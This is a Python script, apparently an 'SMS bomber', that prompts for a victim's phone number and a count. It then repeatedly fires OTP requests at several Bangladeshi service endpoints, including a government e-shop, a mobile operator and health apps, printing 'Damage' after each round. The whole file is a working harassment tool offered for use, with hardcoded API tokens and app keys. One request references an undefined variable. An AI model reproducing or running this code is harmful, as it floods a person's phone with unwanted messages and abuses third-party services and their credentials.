import requests
from requests.structures import CaseInsensitiveDict

green = '\033[1;32m'
end = '\033[0m'
print (green+"""  _______ _    _ _  _____                                         
 |__   __| |  | (_)/ ____|                                        
    | |  | |__| |_| (___                                          
    | |  |  __  | |\___ \                                         
    | |  | |  | | |____) |                                        
   _|_|_ |_|  |_|_|_____/____   __  __                            
  / ____|      / ____|__   __| |  \/  |                           
 | (___  _   _| (___    | | ___| \  / |                           
  \___ \| | | |\___ \   | |/ _ \ |\/| |                           
  ____) | |_| |____) |  | |  __/ |  | |                           
 |_____/ \__, |_____/___|_|\___|_|  |_|                           
  / ____| __/ |     |__   __|                                     
 | |     |___/___  __ _| | ___  _ __                              
 | |    | '__/ _ \/ _` | |/ _ \| '__|                             
 | |____| | |  __/ (_| | | (_) | |                                
  \_____|_|  \___|\__,_|_|\___/|_|                                
 |  _ \                                                           
 | |_) |_   _                                                     
 |  _ <| | | |                                                    
 | |_) | |_| |                                                    
 |____/ \__, |                                                    
         __/ |                                                    
   __  _|___/ _____         _____ _    _       _  ___ ____   __   
  / / | |  | |  __ \       / ____| |  | |     | |/ (_)  _ \  \ \  
 | |  | |__| | |  | |_____| (___ | |__| | __ _| ' / _| |_) |  | | 
 | |  |  __  | |  | |______\___ \|  __  |/ _` |  < | |  _ <   | | 
 | |  | |  | | |__| |      ____) | |  | | (_| | . \| | |_) |  | | 
 | |  |_|  |_|_____/      |_____/|_|  |_|\__,_|_|\_\_|____/   | | 
  \_\                                                        /_/  
                                                                  """+end)

# CVALUE
blue = '\33[94m'
lightblue = '\033[94m'
red = '\033[91m'
white = '\33[97m'
yellow = '\33[93m'
green = '\033[1;32m'
cyan = "\033[96m"
end = '\033[0m'
print ("\033[32m")

print ("	 -!-!- WeLcOmE-!-!- ( HD-SHaKiiB ) ( GhOsToFKiinG ) ")


print ("""
          
                       
   ╔═════════════════════════════════╗
   ║ AuTHor   : SHaKiiB ツ           ║
   ║ FaCeBooK : iTzSHaKiiB           ║
   ║ GitHuB   : iTzSHaKiB            ║
   ╚═════════════════════════════════╝
       
 
  
  
""")

number  = str(input("[>] Heii Mr : SHaKiiB Sir. apNar aTTack NumBer DiN: "))


amount = int(input("[>] Sir apNar aTTack ar PoriMaN LikHuN: "))

url1 = "https://api.ekshop.gov.bd:3001/api/initotp"

headers1 = CaseInsensitiveDict()
headers1["Content-Type"] = "application/json"

data1 = """{\"phone_number\":\""""+number+"""\",\"country_code\":\"+88\",\"phone\":\"01819400400\"}"""

url11 = "https://ucapi.vnksrvc.com/users/send_user_otp.json"

headers11 = CaseInsensitiveDict()
headers11["Content-Type"]="application/json"

data11 = """{
  \"direct_login\": true,
  \"user\": {
    \"resend\": false,
    \"login\": \"88"""+number+"""\",
    \"type\": {
      \"register\": true
    }
  }
}"""

url13 = "http://27.131.15.19/lstyle/api/lsotprequest"

headers13 = CaseInsensitiveDict()

headers13["Content-Length"]="48"

headers13["Content-Type"]="application/json"

data13 = """{
  \"shortcode\": \"2494905\",
  \"msisdn\": \"88"""+number+"""\"
}"""



url14 = "http://www.cinespot.mobi/api/cinespot/v1/otp/sms/mobile-"+number+"/operator-Robi/send"


url9 = "https://api.jslglobal.co/user-api/v3/send-otp?phone=%2B88"+number+"&jatri_token=J9vuqzxHyaWa3VaT66NsvmQdmUmwwrHj"

headers9 = CaseInsensitiveDict()

headers9["Content-Type"]="application/json"

url6 = "https://htmind.live/api/user/otp-request?phone="+number

headers6 = CaseInsensitiveDict()
headers6["Content-Type"] = "application/json"
headers6["Content-Length"] = "0"

url17 = "https://api.maya-apa.com/api/v5/app/send_otp?phone=88"+number+"&device_id=df180efb23ee233d&source=app&lat=0.00&long=0.00"

headers17 = CaseInsensitiveDict()
headers17["Content-Type"] = "application/json"
headers17["Content-Length"] = "0"

url18 = "http://45.114.85.19:8080/v3/otp/send?msisdn=88"+number

url15 = "https://circle.robi.com.bd/mylife/appapi/appcall.php?op=getOTC&pin=13001&app_version=79&msisdn=88"+number

headers15 = CaseInsensitiveDict()
headers15["x-app-key"] = "000oc0so48owkw4s0wwo4c00g00804w80gwkw8kg"
headers15["User-Agent"]="gzip"


for i in range(amount):
	try:
		resp1 = requests.post(url1, headers=headers1, data=data1)
		
		resp6 = requests.post(url6, headers=headers6)
		
		resp14 = requests.get(url14)
	
		resp9 = requests.post(url9, headers=headers9)
	
		resp11 = requests.post(url11, headers=headers11,  data=data11)
	
		resp13 = requests.post(url13, headers=headers13,  data=data13)
	
		resp17 = requests.post(url17, headers=headers17)
		
		resp18 = requests.get(url)
		
		resp15 = requests.post(url15, headers=headers15)
	
		print(str (i+1)+" Damage \n")
	
	except:
		print ("Please Make Sure Your Internet Connection")	